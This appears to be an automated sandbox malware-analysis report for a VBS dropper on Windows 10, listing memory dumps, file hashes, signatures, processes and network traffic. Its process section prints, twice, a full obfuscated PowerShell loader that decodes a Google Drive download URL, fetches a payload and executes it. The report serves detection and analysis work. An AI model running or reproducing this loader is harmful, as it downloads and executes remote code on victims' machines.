memory/2488-367-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-369-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-370-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-371-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-372-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-373-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-374-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-375-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-366-0x0000000000590000-0x0000000005306000-memory.dmp
memory/2488-376-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-377-0x0000000000400000-0x0000000000581000-memory.dmp
memory/1388-378-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/2488-402-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-403-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-404-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-405-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-406-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-407-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-408-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2488-409-0x0000000000400000-0x0000000000581000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-29 02:11
Reported
2024-03-29 02:14
Platform
win10v2004-20231215-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4384 -ip 4384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 2632
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.135.221.88.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 6fa3bc0693f9b25f755076e62bd16488 |
| SHA1 | d77b88b84c54212206c1bb64b53030b72a090b46 |
| SHA256 | 77440d6aa22f460064cdbe56994ea71dfe93ab1db91ec5129095d84a4ccfeaf7 |
| SHA512 | 25e75355d43215518d3f95944d68ac515170a1360cd0ef75cb3cfffb94c0b85749917e219c039fb35a81789f1fcb245e4f9f3172295c65b936abd64e23240d3f |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 66dbe46189a99a73b9346672d34c3138 |
| SHA1 | 2818445ada528c9fd9c04c95369039adde8f6708 |
| SHA256 | 44446099d2fb29ec6c60d5ab1490eeb9f0a35b1e620342c2fb3ea49354bcc61f |
| SHA512 | b11b12e3859b2092ea8455af5de1e0e15210325e0ad8bd6a51ef6d1cb0f3925480e73342e1c41320060bbf38adea1e6f135628c8087a6c05b37c0330c1fed6ac |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 431dee567c8386cb30dba8162227f153 |
| SHA1 | 819be3b532ceb44a8f39a795494f822e61c76ec8 |
| SHA256 | 9d6611a404f78948afd12a529462e776b597216139365b3a3f0c0c765e03ff7b |
| SHA512 | e33ebdf090896fd82ad1f9f40ba99af5c5dc60763c0e64278dc0b2a94df31ccf326ff51553bd905caf35354968cec268fe2f0022ccaf650061e8dc504113cdc5 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | d66a3ee0adf3cab478770229c65f1325 |
| SHA1 | 7a346f32392b488ff8ffe1e04b418162ee122f69 |
| SHA256 | aeaf13cb0a80ec05e8aebd26fd84b6c14ee6339dcc6012ffae69b0ac9b483d83 |
| SHA512 | f38ffb82f54a2d1fd6d833358361879395d0f02860754e1c2dc3bf70d8f572a0a1d757accdd5622071498da32ee2195b57d3c4bba97cd39ce2a8ae86e5e37d07 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 574c55c3664ae5736b02b985575ef8fd |
| SHA1 | d6a5ae6ec2186d56e429f0d6d9a820a64ea2e5bd |
| SHA256 | 4187466f21a6a3c69282e6bf476b5d33b13304b7a60f724cc5b0bbb5d0c0aed1 |
| SHA512 | 0e03f11815aa0118369b9f33aea1ba65887130cdc7e7dbd819c4949d0dc38e3a3734395c10f491c25efd7007e80ea205c1944f352e8339ffc46543c9e42468d3 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 41077e923293898955e78267b7878339 |
| SHA1 | 36083128a00b83103bfe8bc36b0042ff6a703012 |
| SHA256 | 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0 |
| SHA512 | 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | a45ba0d9e34080482621cd2538f9b4f8 |
| SHA1 | d76f3ecbe487e2a2ce081d59966b546811e517dc |
| SHA256 | 3f76198c3a8aa09768b853a462a13de2c4302761f0c2d34de5f761e59033f471 |
| SHA512 | a7da77f44be0a7ac8834551b9d3133eb46b65489a1d55df69a3e7039dafcc65d36aeaf5c9efdef4acbe454a852c6c377071c3ce84f47cbdd38eece2d776d8d16 |
memory/2364-281-0x000001B42A6F0000-0x000001B42A712000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmtcztfo.v2b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2364-291-0x00007FFEE7340000-0x00007FFEE7E01000-memory.dmp
memory/2364-293-0x000001B429E30000-0x000001B429E40000-memory.dmp
memory/2364-292-0x000001B429E30000-0x000001B429E40000-memory.dmp
memory/2364-294-0x000001B42AB90000-0x000001B42ABB6000-memory.dmp
memory/2364-295-0x000001B42AC30000-0x000001B42AC44000-memory.dmp
memory/2364-296-0x000001B429E30000-0x000001B429E40000-memory.dmp
memory/4384-297-0x0000000002150000-0x0000000002186000-memory.dmp
memory/4384-298-0x0000000074DB0000-0x0000000075560000-memory.dmp
memory/4384-299-0x00000000047A0000-0x00000000047B0000-memory.dmp
memory/4384-300-0x0000000004DE0000-0x0000000005408000-memory.dmp
memory/4384-301-0x0000000004BA0000-0x0000000004BC2000-memory.dmp
memory/4384-302-0x0000000004C50000-0x0000000004CB6000-memory.dmp
memory/4384-303-0x0000000004CC0000-0x0000000004D26000-memory.dmp
memory/4384-313-0x0000000005450000-0x00000000057A4000-memory.dmp
memory/4384-314-0x0000000005A90000-0x0000000005AAE000-memory.dmp
memory/4384-315-0x0000000005AB0000-0x0000000005AFC000-memory.dmp
memory/4384-316-0x0000000007310000-0x000000000798A000-memory.dmp
memory/4384-317-0x0000000006060000-0x000000000607A000-memory.dmp
memory/4384-319-0x0000000006C90000-0x0000000006CB2000-memory.dmp
memory/4384-318-0x0000000006D30000-0x0000000006DC6000-memory.dmp
memory/4384-320-0x0000000007F40000-0x00000000084E4000-memory.dmp
memory/4384-321-0x0000000006D00000-0x0000000006D22000-memory.dmp
memory/4384-322-0x0000000006F60000-0x0000000006F74000-memory.dmp
memory/4384-323-0x0000000074DB0000-0x0000000075560000-memory.dmp
memory/2364-326-0x00007FFEE7340000-0x00007FFEE7E01000-memory.dmp